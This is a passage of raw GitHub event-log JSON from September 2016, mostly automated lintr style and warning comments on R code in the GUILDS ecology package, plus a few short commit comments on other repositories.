tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L39) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  sad <- sort_aux(aux)\n         ^~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L60) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L61) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L88) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L89) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:28:3:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L28) *warning:* **local variable ‘SADX’ assigned but may not be used**\n```r\n​  SADX <- c()\n  ^~~~\n```\n[R/generateData.R:29:3:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L29) *warning:* **local variable ‘SADY’ assigned but may not be used**\n```r\n​  SADY <- c()\n  ^~~~\n```\n[R/generateData.R:36:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:36:66:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:37:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:18:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                 ^\n```\n[R/generateData.R:42:28:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/generateData.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n             ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:44:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                           ^~~~\n```\n[R/generateData.R:49:49:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                                ^\n```\n[R/generateData.R:55:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sadx <- generate.ZSM(theta, I_X, NX)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sady <- generate.ZSM(theta, I_Y, NY)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = sadx, guildY = sady)\n                ^\n```\n[R/generateData.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:64:38:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                     ^\n```\n[R/generateData.R:64:46:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                             ^\n```\n[R/generateData.R:64:48:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                               ^\n```\n[R/generateData.R:66:39:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  b <- lgamma(theta_x + theta_y + J) - \n                                      ^\n```\n[R/generateData.R:68:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:71:32:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                              ~^~\n```\n[R/generateData.R:71:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                                ~^~\n```\n[R/generateData.R:72:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:76:1:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​localComm <- function(alpha_x, alpha_y, Jx, Jy, px) {\n^~~~~~~~~\n```\n[R/generateData.R:82:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:82:66:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:83:27:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:85:4:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L85) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(is.infinite(I_X) && is.infinite(I_Y)) {\n   ^\n```\n[R/generateData.R:86:29:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​     output <- exp( lgamma(J+1) - \n                           ~^~\n```\n[R/generateData.R:86:34:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​     output <- exp( lgamma(J+1) - \n                                 ^\n```\n[R/generateData.R:87:36:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(Jx + 1) + \n                                   ^\n```\n[R/generateData.R:89:35:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    Jx * log(nx) + \n                                  ^\n```\n[R/generateData.R:90:23:](https://github.com/thijsjanzen/GUILDS/blob/e8c6beed0a5ee16757d4745ebc9b2e7522d9af6e/R/generateData.R#L90) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-Jx) * log(ny))\n                     ~^~\n```\n"}},"created_at":"2016-09-22T22:46:02Z"}
{"id":"4605566668","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"gregarndt/servo"},"payload":{"comment":{"id":19138150,"position":null,"line":null,"path":null,"commit_id":"3fa6b6d7890207df8993942a3bbe822320eb014f","created_at":"2016-09-22T22:47:03Z","updated_at":"2016-09-22T22:47:03Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZRQbGCKuRgOTIzVyMTfKpg"}},"created_at":"2016-09-22T22:47:03Z"}
{"id":"4605568973","type":"CommitCommentEvent","actor":{"login":"eliperkins"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19138155,"position":5,"line":374,"path":"stdlib/public/core/UnicodeScalar.swift","commit_id":"628b7c9e16733b275b5060df30c03523a6639b45","created_at":"2016-09-22T22:47:36Z","updated_at":"2016-09-22T22:47:36Z","body":"Sure thing! 😅 "}},"created_at":"2016-09-22T22:47:36Z"}
{"id":"4605572423","type":"CommitCommentEvent","actor":{"login":"dlindahl"},"repo":{"name":"doublesharp/nodemailer-mock"},"payload":{"comment":{"id":19138162,"position":1,"line":1,"path":"lib/nodemailer-mock.js","commit_id":"ac561f3438e4810f385418d92f8d00fe24a86e81","created_at":"2016-09-22T22:48:30Z","updated_at":"2016-09-22T22:48:30Z","body":"Removing `'use strict'` prevents `nodemailer-mock` from working in Node 4 without a flag (which in some environments is not possible to set)\r\n\r\n```\r\n\r\nAny chance you could put these back in?"}},"created_at":"2016-09-22T22:48:30Z"}
{"id":"4605580899","type":"CommitCommentEvent","actor":{"login":"benmarwick"},"repo":{"name":"aaronwolen/mjbtramp"},"payload":{"comment":{"id":19138187,"position":null,"line":null,"path":null,"commit_id":"1e15715ff8baa07ba8654a3ed987c081469b7543","created_at":"2016-09-22T22:50:43Z","updated_at":"2016-09-22T22:50:43Z","body":"Hi Aaron,\r\n\r\nThanks for your note. Yes, my sole motivation for using continuous integration services like travis and circle is to check my analysis code. Mostly it catches basic things like a missing para or period, and sometimes more complicated things. And saves me from using my computer resources to test after each commit. Fully worth the few mins of effort to setup at the start of a project, in my opinion. \r\n\r\nI'd love to have a look at your repo of that's OK. I'm always open to new ideas for tooling research compendia!"}},"created_at":"2016-09-22T22:50:43Z"}
{"id":"4605582963","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19138195,"position":null,"line":null,"path":null,"commit_id":"e98a780dd661a38d4e17353e95c1c84a026a6d23","created_at":"2016-09-22T22:51:14Z","updated_at":"2016-09-22T22:51:14Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-22T22:51:14Z"}
{"id":"4605591391","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19138210,"position":null,"line":null,"path":null,"commit_id":"073d144cb66c36c2b0dc8459ed2040eeadf9cffa","created_at":"2016-09-22T22:53:27Z","updated_at":"2016-09-22T22:53:27Z","body":"[R/Condition.R:23:16:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L23) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  k  <-  lgamma( (theta_x / 2) + (theta_y / 2)) -\n               ^\n```\n[R/Condition.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n         ^\n```\n[R/Condition.R:25:42:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ((theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/073d144cb66c36c2b0dc8459ed2040eeadf9cffa/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        